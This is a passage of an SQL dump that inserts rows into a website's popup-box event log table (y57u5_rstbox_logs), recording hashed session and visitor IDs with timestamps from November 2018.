(31628, '33777cc7bb07171f8db017e0e3dc8574', 'ee0826f8778c48c2', 0, 2, 1, '2018-11-22 21:16:34'),
(31629, '33777cc7bb07171f8db017e0e3dc8574', 'ee0826f8778c48c2', 0, 2, 1, '2018-11-22 21:16:42'),
(31630, 'ae87c20bc9ca8be393d6968bd96c4616', 'aa2805d36534e501', 0, 2, 1, '2018-11-22 23:54:00'),
(31631, '3c493ea81d0cd4d6e28196e96e11fe45', '1d704360345ebb63', 0, 2, 1, '2018-11-23 00:23:16'),
(31632, '5aa2fecdc03380e1ee5cc2c31beb9829', '99bc1c44ecab148f', 0, 2, 1, '2018-11-23 00:45:21'),
(31633, 'd4a7428bf0ae1531ed9640a003384db6', 'fe961668877fa513', 0, 2, 1, '2018-11-23 02:06:51'),
(31634, 'd4a7428bf0ae1531ed9640a003384db6', 'fe961668877fa513', 0, 2, 1, '2018-11-23 02:06:58'),
(31635, 'd4a7428bf0ae1531ed9640a003384db6', 'fe961668877fa513', 0, 2, 1, '2018-11-23 02:07:10'),
(31636, 'd4a7428bf0ae1531ed9640a003384db6', 'fe961668877fa513', 0, 2, 1, '2018-11-23 02:07:22'),
(31637, '948aa256d70e7498873cc27df0407fc4', '1d520b6ba5a3ba8b', 0, 2, 1, '2018-11-23 04:18:51'),
(31638, 'd4a7428bf0ae1531ed9640a003384db6', 'fe961668877fa513', 0, 2, 1, '2018-11-23 04:44:33'),
(31639, 'aaf2a51c28082639279d2941aff9eec6', 'b6759868338ce6a4', 0, 2, 1, '2018-11-23 04:45:28'),
(31640, 'c66ae2c5f7f28e8014bdd33f39156186', '881a0226fbd2abc8', 0, 2, 1, '2018-11-23 05:01:12'),
(31641, 'c66ae2c5f7f28e8014bdd33f39156186', '881a0226fbd2abc8', 0, 2, 1, '2018-11-23 05:02:38'),
(31642, '9f4304a2b8fcf340936e850b218f992b', '381aa1d8da306be0', 0, 2, 1, '2018-11-23 05:34:00'),
(31643, 'e77fd4adf9461bae72fac3d4b5cbb3c6', '3a117b4ac9c6014b', 0, 2, 1, '2018-11-23 06:24:18'),
(31644, 'e3de347b4a598a2e9e86b9aee6a98cfb', '9e3b65206ef4a1ad', 0, 2, 1, '2018-11-23 07:00:14'),
(31645, '3d84132b119d1db74c8ad24afc3021a2', 'a415cac9f3514dba', 0, 2, 1, '2018-11-23 08:15:21'),
(31646, 'bed4e68c78a0d3867f2e4683925d4d99', '0108ac5263d127f4', 0, 2, 1, '2018-11-23 08:40:04'),
(31647, '29166db03cb7bb12f340619167c5cba2', '0d80024aafdd5489', 0, 2, 1, '2018-11-23 09:07:08'),
(31648, '29166db03cb7bb12f340619167c5cba2', '0d80024aafdd5489', 0, 2, 1, '2018-11-23 09:07:27'),
(31649, '29166db03cb7bb12f340619167c5cba2', '0d80024aafdd5489', 0, 2, 1, '2018-11-23 09:07:58'),
(31650, '29166db03cb7bb12f340619167c5cba2', '0d80024aafdd5489', 0, 2, 1, '2018-11-23 09:08:24'),
(31651, '29166db03cb7bb12f340619167c5cba2', '0d80024aafdd5489', 0, 2, 1, '2018-11-23 09:08:48'),
(31652, '29166db03cb7bb12f340619167c5cba2', '0d80024aafdd5489', 0, 2, 1, '2018-11-23 09:09:48'),
(31653, 'b4395029b25f1a6d0c14449f4bc62a84', '0d8cc63ce25c98b4', 0, 2, 1, '2018-11-23 09:15:45'),
(31654, '2886537cd1d80ee3b94c1f98275bddda', 'd96c2afbf8baa5bb', 0, 2, 1, '2018-11-23 09:21:12'),
(31655, '2886537cd1d80ee3b94c1f98275bddda', 'd96c2afbf8baa5bb', 0, 2, 1, '2018-11-23 09:22:49'),
(31656, '3f156d6800a3b60b8357b2572bd968ef', 'cfedc6f42d5d6a3b', 0, 2, 1, '2018-11-23 09:28:26'),
(31657, '9ada1453bd7fffa6368744ffebc68cae', '5df1dcc4e93594b4', 0, 2, 1, '2018-11-23 09:33:12'),
(31658, '9ada1453bd7fffa6368744ffebc68cae', '5df1dcc4e93594b4', 0, 2, 1, '2018-11-23 09:33:38'),
(31659, '9ada1453bd7fffa6368744ffebc68cae', '5df1dcc4e93594b4', 0, 2, 1, '2018-11-23 09:34:05'),
(31660, '7c3912cdfc8c922ccfa06c3a604c07aa', '0d80024aafdd5489', 0, 2, 1, '2018-11-23 10:02:05'),
(31661, '7c3912cdfc8c922ccfa06c3a604c07aa', '0d80024aafdd5489', 0, 2, 1, '2018-11-23 10:02:37'),
(31662, '7c3912cdfc8c922ccfa06c3a604c07aa', '0d80024aafdd5489', 0, 2, 1, '2018-11-23 10:03:14'),
(31663, '2886537cd1d80ee3b94c1f98275bddda', 'd96c2afbf8baa5bb', 0, 2, 1, '2018-11-23 11:16:43'),
(31664, '2886537cd1d80ee3b94c1f98275bddda', 'd96c2afbf8baa5bb', 0, 2, 1, '2018-11-23 11:18:45'),
(31665, 'c2cf315dfc4c27a1ea21f6d90d131265', '685a1da6e085d951', 0, 2, 1, '2018-11-23 11:19:21'),
(31666, '6e7a951edb2b68fdc355d41fa4f95d4b', '1e13d8757151a614', 0, 2, 1, '2018-11-23 11:38:02'),
(31667, 'ee76fc5cd9a22d58ead2821cf73ae44f', '46f3ffb0ff811ed7', 0, 2, 1, '2018-11-23 11:38:04'),
(31668, 'c2cf315dfc4c27a1ea21f6d90d131265', '685a1da6e085d951', 0, 2, 1, '2018-11-23 11:44:03'),
(31669, '42259e076e9f51a4b2dd6d0e8b674612', '96fdf4df356c8157', 0, 2, 1, '2018-11-23 11:44:26'),
(31670, 'c2cf315dfc4c27a1ea21f6d90d131265', '685a1da6e085d951', 0, 2, 1, '2018-11-23 11:59:07'),
(31671, '0bdcf289f0f786eee54c579a88455ca9', '54a13dd891a9f78f', 0, 2, 1, '2018-11-23 11:59:47'),
(31672, 'ea3346d0ac4725ed624cda1488ed0937', '5d05c790f4830fad', 0, 2, 1, '2018-11-23 12:10:20'),
(31673, 'ea3346d0ac4725ed624cda1488ed0937', '5d05c790f4830fad', 0, 2, 1, '2018-11-23 12:46:51'),
(31674, '1b4bc062bebb5428cbc2261b2b86b145', '3affdb6d237dd814', 0, 2, 1, '2018-11-23 12:53:42'),
(31675, '74047b0e94acac18b4915d584485e76d', '8806ba608f66c4be', 0, 2, 1, '2018-11-23 13:25:55'),
(31676, '05c60544a60631a853d3aa2e5c15f526', '8806ba608f66c4be', 0, 2, 1, '2018-11-23 13:26:41'),
(31677, 'd4d2d4d7ea774f8a1e5186359c3b6cbc', '8806ba608f66c4be', 0, 2, 1, '2018-11-23 13:28:26'),
(31678, '0bdcf289f0f786eee54c579a88455ca9', '54a13dd891a9f78f', 0, 2, 1, '2018-11-23 13:45:07'),
(31679, '0bdcf289f0f786eee54c579a88455ca9', '54a13dd891a9f78f', 0, 2, 1, '2018-11-23 13:46:06'),
(31680, 'c3bb17344b2d1445be3c83f358ecb05d', '72a46c2e1f60cfd2', 0, 2, 1, '2018-11-23 15:34:31'),
(31681, 'fd9546fcd4559610671ee5b2d4a095cd', '819477a20772ca36', 0, 2, 1, '2018-11-23 15:39:18'),
(31682, '70bde310ea962a0b2d8175cf091b31a3', '0862e2fae98e84f4', 0, 2, 1, '2018-11-23 16:08:28'),
(31683, '72e4c433a714881abfa7780b6d8ff4c6', 'bebd9933c01cab5c', 0, 2, 1, '2018-11-23 17:40:29'),
(31684, '3a4e09e601d632d0cdaa0d72da6148f3', 'd95bb1534d2fc9b8', 0, 2, 1, '2018-11-23 18:29:10'),
(31685, '3a4e09e601d632d0cdaa0d72da6148f3', 'd95bb1534d2fc9b8', 0, 2, 1, '2018-11-23 18:42:40'),
(31686, '3a4e09e601d632d0cdaa0d72da6148f3', 'd95bb1534d2fc9b8', 0, 2, 1, '2018-11-23 19:03:41'),
(31687, 'c8b455e73b4fb2ef1d88b07f675fef6a', '67b33b4cd95db8cb', 0, 2, 1, '2018-11-23 19:22:00'),
(31688, '68a62c7e8b7e21d6df03bfaa3d0fd0ee', '15c15ea658948fee', 0, 2, 1, '2018-11-23 21:13:07'),
(31689, '10d75fc14e86a2c6ba31dc5bc0e1bfad', '92de64a36887addf', 0, 2, 1, '2018-11-23 21:14:35'),
(31690, 'c264d3a63307fbfd068ec8d501decfb8', '3e9a0efa0c66becf', 0, 2, 1, '2018-11-23 22:23:59'),
(31691, '55fcdd3fddd9409a4d857fc29965f4bf', '7c58bce8a550cf46', 0, 2, 1, '2018-11-23 23:03:58'),
(31692, 'c58592d2ee665615c4b40dc3d7d9aee4', '06b082a1e3aeefcb', 0, 2, 1, '2018-11-24 00:20:50'),
(31693, '48515ff2623d16c92d9f54453a2376c9', '1310e29725d4c11e', 0, 2, 1, '2018-11-24 00:21:07'),
(31694, 'd2fd96f9132512b0d7d66cb8ae4ce9b1', 'f86fdfb8ada171f1', 0, 2, 1, '2018-11-24 00:28:39'),
(31695, 'ea3346d0ac4725ed624cda1488ed0937', '5d05c790f4830fad', 0, 2, 1, '2018-11-24 00:32:01'),
(31696, 'b9fb4d7346d19c9ecd4fa53d4f5b7ca1', '17aec2fa7aca00ee', 0, 2, 1, '2018-11-24 00:32:15'),
(31697, 'd12a5d05a4b860d050e81e56bd3c5f5d', 'f8a86dcf9504cfc8', 0, 2, 1, '2018-11-24 00:44:26'),
(31698, '1bc8539dba4cbbf43dcc6a8a83a587da', 'fdcaf87f5dacc2a9', 0, 2, 1, '2018-11-24 01:43:58'),
(31699, '4ab7164a3190b467db1e83ca019d4112', '381aa1d8da306be0', 0, 2, 1, '2018-11-24 02:08:04'),
(31700, 'c2cf315dfc4c27a1ea21f6d90d131265', '685a1da6e085d951', 0, 2, 1, '2018-11-24 04:30:18'),
(31701, 'ab11dc642d4204d974d587e8d4d52af1', '85393dd606f0298d', 0, 2, 1, '2018-11-24 05:01:47'),
(31702, 'ab11dc642d4204d974d587e8d4d52af1', '85393dd606f0298d', 0, 2, 1, '2018-11-24 05:01:55'),
(31703, 'ab11dc642d4204d974d587e8d4d52af1', '85393dd606f0298d', 0, 2, 1, '2018-11-24 05:02:09'),
(31704, 'ab11dc642d4204d974d587e8d4d52af1', '85393dd606f0298d', 0, 2, 1, '2018-11-24 05:07:16'),
(31705, 'ab11dc642d4204d974d587e8d4d52af1', '85393dd606f0298d', 0, 2, 1, '2018-11-24 05:07:19'),
(31706, 'ab11dc642d4204d974d587e8d4d52af1', '85393dd606f0298d', 0, 2, 1, '2018-11-24 05:07:41'),
(31707, 'f3f78a7aff6b9627a174ab6c46971999', '0e41913b87c11ea2', 0, 2, 1, '2018-11-24 05:11:41'),
(31708, '862939c8271863c035d22219433787a0', '4214e4cc56d9a0ed', 0, 2, 1, '2018-11-24 05:11:51'),
(31709, 'ab11dc642d4204d974d587e8d4d52af1', '85393dd606f0298d', 0, 2, 1, '2018-11-24 05:17:02'),
(31710, '61c35d556a80477aeba8260c50f15d12', '0e7fe7fe2caf3793', 0, 2, 1, '2018-11-24 05:21:31'),
(31711, '61c35d556a80477aeba8260c50f15d12', '0e7fe7fe2caf3793', 0, 2, 1, '2018-11-24 05:21:33'),
(31712, 'c2cf315dfc4c27a1ea21f6d90d131265', '685a1da6e085d951', 0, 2, 1, '2018-11-24 05:24:21'),
(31713, '39a20b7b2c3892ad5079729ea77339b1', '366f8f749d6322ea', 0, 2, 1, '2018-11-24 06:17:41'),
(31714, 'c4f9964e2fc43365bc6e8370bd9ca19e', '85393dd606f0298d', 0, 2, 1, '2018-11-24 06:47:21'),
(31715, 'c4f9964e2fc43365bc6e8370bd9ca19e', '85393dd606f0298d', 0, 2, 1, '2018-11-24 06:51:20'),
(31716, 'fb1e3647bb95297e93dd5f950a578540', 'ffbc7f0f11e41acb', 0, 2, 1, '2018-11-24 07:36:33'),
(31717, '72568ecc4236980c0d6bed195467c684', 'ca67438dac6b53fc', 0, 2, 1, '2018-11-24 07:38:43'),
(31718, 'ea3346d0ac4725ed624cda1488ed0937', '5d05c790f4830fad', 0, 2, 1, '2018-11-24 08:42:56'),
(31719, 'ea3346d0ac4725ed624cda1488ed0937', '5d05c790f4830fad', 0, 2, 1, '2018-11-24 08:54:31'),
(31720, '25be041a03b5a97a3214a347176f6964', 'cf5d697be26ddd76', 0, 2, 1, '2018-11-24 09:39:25'),
(31721, '0aec3a55dcf5c2ad687599da437fecc3', '85ac5d6579822393', 0, 2, 1, '2018-11-24 09:40:45'),
(31722, 'ea3346d0ac4725ed624cda1488ed0937', '5d05c790f4830fad', 0, 2, 1, '2018-11-24 10:03:58'),
(31723, 'ea3346d0ac4725ed624cda1488ed0937', '5d05c790f4830fad', 0, 2, 1, '2018-11-24 10:05:06'),
(31724, 'e673647e3644e9ef676bf35dcb802ca6', 'f83ecb17cb9f26ea', 0, 2, 1, '2018-11-24 10:46:20'),
(31725, '07fba8deccb00e89a12bac3b09cb4436', '18e799c7f90a4e00', 0, 2, 1, '2018-11-24 10:46:29'),
(31726, 'e673647e3644e9ef676bf35dcb802ca6', 'f83ecb17cb9f26ea', 0, 2, 1, '2018-11-24 10:47:36'),
(31727, 'e673647e3644e9ef676bf35dcb802ca6', 'f83ecb17cb9f26ea', 0, 2, 1, '2018-11-24 10:49:02');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(31728, '2f67b2a407d1cc6cd77f669ae494b31b', 'c465446ae32bd083', 0, 2, 1, '2018-11-24 12:39:18'),
(31729, '9a4df054cf6e1bed2f86edeb54b1e744', 'de2ceea78f84b5b8', 0, 2, 1, '2018-11-24 12:39:54'),
(31730, 'b7b504920e137ae3dd6a88d959df045c', '5a59ed9d0580b9f8', 0, 2, 1, '2018-11-24 13:42:02'),
(31731, '2428c57f38a493946daa6a7418756a72', '7a68fbbdfc6c014d', 0, 2, 1, '2018-11-24 14:04:43'),
(31732, '71a532b114e97b6fe2081dbd50d819be', 'd26af59fbeb9261a', 0, 2, 1, '2018-11-24 14:28:45'),
(31733, 'c32d553e516d0bff3db3ff2cb355c76f', 'a04a65e1d6497951', 0, 2, 1, '2018-11-24 15:15:29'),
(31734, 'a267a75197abbbbf6b8a7884a1df1d3b', 'd9bcbb21bff74e36', 0, 2, 1, '2018-11-24 15:15:29'),
(31735, 'fb0ea9b436bbbe06444289c2686dc52c', 'b28897fc9ec57c33', 0, 2, 1, '2018-11-24 15:17:51'),
(31736, '99cfc2112584739edcd18ae79819a6f2', 'db8d03f2449dc612', 0, 2, 1, '2018-11-24 15:43:51'),
(31737, '684b3de48cf8824b2170f4d94ad28f10', '51df446c19685386', 0, 2, 1, '2018-11-24 17:29:18'),
(31738, '0f26adc4637943def7fe8ef371f95b9d', 'ec298f16abca1ffa', 0, 2, 1, '2018-11-24 18:29:14'),
(31739, '9355f42e433ab0e53da873274a0d8a32', 'a241b97c40d2b2c5', 0, 2, 1, '2018-11-24 19:37:38'),
(31740, '92695411210a13c7613582bdb261caa7', '6f2a8ec0d0de359d', 0, 2, 1, '2018-11-24 20:09:12'),
(31741, '932b1ff201f10eace3b1f11a6d7ccc1a', 'b7dfb908ec300439', 0, 2, 1, '2018-11-24 20:40:43'),
(31742, 'a4cff80b2efec3401c8c425adfbe09e0', 'c21b863ecdd30da4', 0, 2, 1, '2018-11-24 21:10:10'),
(31743, '9be7391c5718f40cf05b6095bd42aada', 'a2b92167f54c9dc2', 0, 2, 1, '2018-11-24 21:39:30'),
(31744, '9be7391c5718f40cf05b6095bd42aada', 'a2b92167f54c9dc2', 0, 2, 1, '2018-11-24 21:39:43'),
(31745, '9be7391c5718f40cf05b6095bd42aada', 'a2b92167f54c9dc2', 0, 2, 1, '2018-11-24 21:40:21'),
(31746, 'b4fcfc81e21b7ff2ffddf34d9f83dd52', '5a3dcc0b36becdba', 0, 2, 1, '2018-11-24 21:49:20'),
(31747, '023265206c361612da9338caa5211403', '20ec4fd4d772757b', 0, 2, 1, '2018-11-24 22:26:28'),
(31748, 'ceeb804254620db229dbc5b4a0a3ab26', '679cf6efc40e8b9e', 0, 2, 1, '2018-11-24 22:45:31'),
(31749, 'fb0ea9b436bbbe06444289c2686dc52c', 'b28897fc9ec57c33', 0, 2, 1, '2018-11-24 22:48:53'),
(31750, '60bae1cb44d8ebf38d9b460046719ae8', 'a470ba56b8f800ef', 0, 2, 1, '2018-11-24 23:05:17'),
(31751, '1d48b81bf41bc2750b933fe407e7ca4e', '765b53b5d45d16dd', 0, 2, 1, '2018-11-25 00:54:06'),
(31752, '4c5be402178774564b07c86ce2c928f4', '08a9a37b99b713c9', 0, 2, 1, '2018-11-25 00:54:19'),
(31753, '5ac6276cae168b284ea225611e656da2', 'af86b04a0e657a18', 0, 2, 1, '2018-11-25 01:23:56'),
(31754, 'c40474edc001eab3ad1af532da28f584', '51df446c19685386', 0, 2, 1, '2018-11-25 02:05:24'),
(31755, '258a0c64cb3cdecf413f7366dee50e5d', 'c7105d2c872a6440', 0, 2, 1, '2018-11-25 03:03:26'),
(31756, '37f8fbb4f5a6df880b6e198695612581', '10b9d0d3af13f128', 0, 2, 1, '2018-11-25 03:06:53'),
(31757, '37f8fbb4f5a6df880b6e198695612581', '10b9d0d3af13f128', 0, 2, 1, '2018-11-25 03:08:42'),
(31758, '8ed8f4691434d173b6e1686d9610c533', '3445ec1b2b203126', 0, 2, 1, '2018-11-25 03:45:18'),
(31759, 'fe5451d72e6dd713e792d04a2403432c', '326bf1055d3468b3', 0, 2, 1, '2018-11-25 03:53:17'),
(31760, '49d807ad15affa9a237c564cffc0a58a', '381aa1d8da306be0', 0, 2, 1, '2018-11-25 04:56:58'),
(31761, '4d636dd564e2c5180c3c7e89db50ac2e', '46713cac27a94b83', 0, 2, 1, '2018-11-25 05:02:46'),
(31762, '4d636dd564e2c5180c3c7e89db50ac2e', '46713cac27a94b83', 0, 2, 1, '2018-11-25 05:03:10'),
(31763, '4d636dd564e2c5180c3c7e89db50ac2e', '46713cac27a94b83', 0, 2, 1, '2018-11-25 05:08:21'),
(31764, '4d636dd564e2c5180c3c7e89db50ac2e', '46713cac27a94b83', 0, 2, 1, '2018-11-25 05:16:48'),
(31765, 'ea2c2a5aa5530550b87b68aed8a461f9', '37bcfac0d3ed0f10', 0, 2, 1, '2018-11-25 05:20:26'),
(31766, '4d636dd564e2c5180c3c7e89db50ac2e', '46713cac27a94b83', 0, 2, 1, '2018-11-25 05:27:13'),
(31767, '2a3c1b56a5a4c1e272f9495233b1b8f6', '5a6e6fc8df61f23d', 0, 2, 1, '2018-11-25 05:32:37'),
(31768, 'ed9746acb60f3d1b0c1f4b4216a259b3', '5a883dd79dd2a20d', 0, 2, 1, '2018-11-25 05:42:33'),
(31769, '451a6779af4ecc3fa2c8c7355975f0e2', '1f2a82cd68d8bbd5', 0, 2, 1, '2018-11-25 05:45:42'),
(31770, '6813e917255efd992b2510d5b5745594', '7ec969d351bcf68e', 0, 2, 1, '2018-11-25 05:55:10'),
(31771, '266dd6d7c3903c4f935f4c089da26257', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 05:59:35'),
(31772, 'ec0ba2ed06e81d60648a4a8c07dc1ece', '52bbcfcf9536a4a7', 0, 2, 1, '2018-11-25 06:00:13'),
(31773, '37f8fbb4f5a6df880b6e198695612581', '10b9d0d3af13f128', 0, 2, 1, '2018-11-25 06:02:44'),
(31774, 'ec0ba2ed06e81d60648a4a8c07dc1ece', '52bbcfcf9536a4a7', 0, 2, 1, '2018-11-25 06:03:33'),
(31775, 'ec0ba2ed06e81d60648a4a8c07dc1ece', '52bbcfcf9536a4a7', 0, 2, 1, '2018-11-25 06:03:54'),
(31776, '2d8347f93088ecbd378350c901dd2c21', '14d059e5da6bdba4', 0, 2, 1, '2018-11-25 06:05:34'),
(31777, '266dd6d7c3903c4f935f4c089da26257', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 06:05:38'),
(31778, 'cfa64c075706457be634a32b2f742c84', '5add1a60d1945357', 0, 2, 1, '2018-11-25 06:06:23'),
(31779, 'ec0ba2ed06e81d60648a4a8c07dc1ece', '52bbcfcf9536a4a7', 0, 2, 1, '2018-11-25 06:06:53'),
(31780, '994e1738b439131766699e27a75fd1ba', '4409ab334b10c25a', 0, 2, 1, '2018-11-25 06:08:01'),
(31781, '994e1738b439131766699e27a75fd1ba', '4409ab334b10c25a', 0, 2, 1, '2018-11-25 06:11:08'),
(31782, '6813e917255efd992b2510d5b5745594', '7ec969d351bcf68e', 0, 2, 1, '2018-11-25 06:11:37'),
(31783, 'ea3346d0ac4725ed624cda1488ed0937', '5d05c790f4830fad', 0, 2, 1, '2018-11-25 06:12:43'),
(31784, 'ea3346d0ac4725ed624cda1488ed0937', '5d05c790f4830fad', 0, 2, 1, '2018-11-25 06:12:53'),
(31785, '2d8347f93088ecbd378350c901dd2c21', '14d059e5da6bdba4', 0, 2, 1, '2018-11-25 06:13:04'),
(31786, '2d8347f93088ecbd378350c901dd2c21', '14d059e5da6bdba4', 0, 2, 1, '2018-11-25 06:13:15'),
(31787, 'bbc57b24f664bc11e28371bac724f8b1', 'a02a3c80cccf2b95', 0, 2, 1, '2018-11-25 06:14:28'),
(31788, 'bbc57b24f664bc11e28371bac724f8b1', 'a02a3c80cccf2b95', 0, 2, 1, '2018-11-25 06:14:41'),
(31789, 'ec0ba2ed06e81d60648a4a8c07dc1ece', '52bbcfcf9536a4a7', 0, 2, 1, '2018-11-25 06:15:06'),
(31790, '6813e917255efd992b2510d5b5745594', '7ec969d351bcf68e', 0, 2, 1, '2018-11-25 06:15:19'),
(31791, '6813e917255efd992b2510d5b5745594', '7ec969d351bcf68e', 0, 2, 1, '2018-11-25 06:16:12'),
(31792, '81e21aaf1c335f4f0d45b7823bb36b35', '0401e62b96c2aa99', 0, 2, 1, '2018-11-25 06:16:58'),
(31793, 'ea3346d0ac4725ed624cda1488ed0937', '5d05c790f4830fad', 0, 2, 1, '2018-11-25 06:17:00'),
(31794, '266dd6d7c3903c4f935f4c089da26257', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 06:17:08'),
(31795, '81e21aaf1c335f4f0d45b7823bb36b35', '0401e62b96c2aa99', 0, 2, 1, '2018-11-25 06:17:34'),
(31796, '81e21aaf1c335f4f0d45b7823bb36b35', '0401e62b96c2aa99', 0, 2, 1, '2018-11-25 06:18:04'),
(31797, '81e21aaf1c335f4f0d45b7823bb36b35', '0401e62b96c2aa99', 0, 2, 1, '2018-11-25 06:18:13'),
(31798, 'ec0ba2ed06e81d60648a4a8c07dc1ece', '52bbcfcf9536a4a7', 0, 2, 1, '2018-11-25 06:18:58'),
(31799, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 06:19:39'),
(31800, '81e21aaf1c335f4f0d45b7823bb36b35', '0401e62b96c2aa99', 0, 2, 1, '2018-11-25 06:19:46'),
(31801, '81e21aaf1c335f4f0d45b7823bb36b35', '0401e62b96c2aa99', 0, 2, 1, '2018-11-25 06:19:54'),
(31802, '81e21aaf1c335f4f0d45b7823bb36b35', '0401e62b96c2aa99', 0, 2, 1, '2018-11-25 06:20:03'),
(31803, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 06:20:10'),
(31804, '81e21aaf1c335f4f0d45b7823bb36b35', '0401e62b96c2aa99', 0, 2, 1, '2018-11-25 06:20:10'),
(31805, '81e21aaf1c335f4f0d45b7823bb36b35', '0401e62b96c2aa99', 0, 2, 1, '2018-11-25 06:20:19'),
(31806, '81e21aaf1c335f4f0d45b7823bb36b35', '0401e62b96c2aa99', 0, 2, 1, '2018-11-25 06:20:54'),
(31807, '81e21aaf1c335f4f0d45b7823bb36b35', '0401e62b96c2aa99', 0, 2, 1, '2018-11-25 06:21:12'),
(31808, '459f8d2a56efb1436f0a63d671e65322', 'e3163f1046dc4449', 0, 2, 1, '2018-11-25 06:22:05'),
(31809, '459f8d2a56efb1436f0a63d671e65322', 'e3163f1046dc4449', 0, 2, 1, '2018-11-25 06:22:19'),
(31810, '81e21aaf1c335f4f0d45b7823bb36b35', '0401e62b96c2aa99', 0, 2, 1, '2018-11-25 06:22:21'),
(31811, 'e8413c2a553672a22be4a126e4067892', 'e3dabdfdee69fc33', 0, 2, 1, '2018-11-25 06:22:58'),
(31812, 'e8413c2a553672a22be4a126e4067892', 'e3dabdfdee69fc33', 0, 2, 1, '2018-11-25 06:23:18'),
(31813, '266dd6d7c3903c4f935f4c089da26257', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 06:23:32'),
(31814, '6cda06fc3b9e28ce48580d02b11f8def', '74aba437eea39f30', 0, 2, 1, '2018-11-25 06:23:42'),
(31815, 'ea3346d0ac4725ed624cda1488ed0937', '5d05c790f4830fad', 0, 2, 1, '2018-11-25 06:24:04'),
(31816, '266dd6d7c3903c4f935f4c089da26257', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 06:25:06'),
(31817, '39b573c7da2f6e2ab2ec2a397ae98750', '3de88ff4581dab27', 0, 2, 1, '2018-11-25 06:25:09'),
(31818, '266dd6d7c3903c4f935f4c089da26257', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 06:26:21'),
(31819, '4143bb7867ff0efc93c4a3c8cb3446a3', 'dbd110ebd49c50d3', 0, 2, 1, '2018-11-25 06:27:01'),
(31820, '39b573c7da2f6e2ab2ec2a397ae98750', '3de88ff4581dab27', 0, 2, 1, '2018-11-25 06:27:01'),
(31821, 'e8413c2a553672a22be4a126e4067892', 'e3dabdfdee69fc33', 0, 2, 1, '2018-11-25 06:27:19'),
(31822, 'ea3346d0ac4725ed624cda1488ed0937', '5d05c790f4830fad', 0, 2, 1, '2018-11-25 06:27:26'),
(31823, '31737d12ee566b4489016077c06da8c4', '7501b42c35accff7', 0, 2, 1, '2018-11-25 06:27:37'),
(31824, 'ab21be33ca1433d38a2d548cdab2815e', 'f10990f26adcd1c5', 0, 2, 1, '2018-11-25 06:27:38'),
(31825, '266dd6d7c3903c4f935f4c089da26257', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 06:28:35'),
(31826, '266dd6d7c3903c4f935f4c089da26257', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 06:29:09'),
(31827, '31737d12ee566b4489016077c06da8c4', '7501b42c35accff7', 0, 2, 1, '2018-11-25 06:29:35'),
(31828, '266dd6d7c3903c4f935f4c089da26257', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 06:31:18'),
(31829, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 06:32:22'),
(31830, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 06:32:55'),
(31831, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 06:33:34'),
(31832, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 06:33:44'),
(31833, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 06:34:24'),
(31834, 'ab21be33ca1433d38a2d548cdab2815e', 'f10990f26adcd1c5', 0, 2, 1, '2018-11-25 06:35:05'),
(31835, '31737d12ee566b4489016077c06da8c4', '7501b42c35accff7', 0, 2, 1, '2018-11-25 06:35:57'),
(31836, 'ec0ba2ed06e81d60648a4a8c07dc1ece', '52bbcfcf9536a4a7', 0, 2, 1, '2018-11-25 06:38:37'),
(31837, '934684dc9c098335af9ac65055fe5370', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-11-25 06:39:00'),
(31838, '2893d7f6164f38c05ecc884c30dacac2', '726aa735bc53b98e', 0, 2, 1, '2018-11-25 06:39:48'),
(31839, '2893d7f6164f38c05ecc884c30dacac2', '726aa735bc53b98e', 0, 2, 1, '2018-11-25 06:39:56'),
(31840, '934684dc9c098335af9ac65055fe5370', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-11-25 06:40:35'),
(31841, 'de6cce957dc6734bf9ea06ba190c7f1b', '12ed21842ec29d17', 0, 2, 1, '2018-11-25 06:41:03'),
(31842, '934684dc9c098335af9ac65055fe5370', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-11-25 06:41:10'),
(31843, '934684dc9c098335af9ac65055fe5370', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-11-25 06:41:37'),
(31844, '34b4aaabb93e498d0bcc72e868dbb3c9', 'e793b6887430710e', 0, 2, 1, '2018-11-25 06:41:46'),
(31845, '34b4aaabb93e498d0bcc72e868dbb3c9', 'e793b6887430710e', 0, 2, 1, '2018-11-25 06:42:04'),
(31846, '934684dc9c098335af9ac65055fe5370', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-11-25 06:42:22'),
(31847, '31737d12ee566b4489016077c06da8c4', '7501b42c35accff7', 0, 2, 1, '2018-11-25 06:43:08'),
(31848, '934684dc9c098335af9ac65055fe5370', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-11-25 06:43:33'),
(31849, 'ef1f5b908c336d7f9dc873007b1fdaec', 'f19010d8a5f137d0', 0, 2, 1, '2018-11-25 06:43:36'),
(31850, 'de6cce957dc6734bf9ea06ba190c7f1b', '12ed21842ec29d17', 0, 2, 1, '2018-11-25 06:44:03'),
(31851, '934684dc9c098335af9ac65055fe5370', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-11-25 06:44:05'),
(31852, 'ec0ba2ed06e81d60648a4a8c07dc1ece', '52bbcfcf9536a4a7', 0, 2, 1, '2018-11-25 06:45:21'),
(31853, 'de6cce957dc6734bf9ea06ba190c7f1b', '12ed21842ec29d17', 0, 2, 1, '2018-11-25 06:45:32'),
(31854, '934684dc9c098335af9ac65055fe5370', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-11-25 06:45:44'),
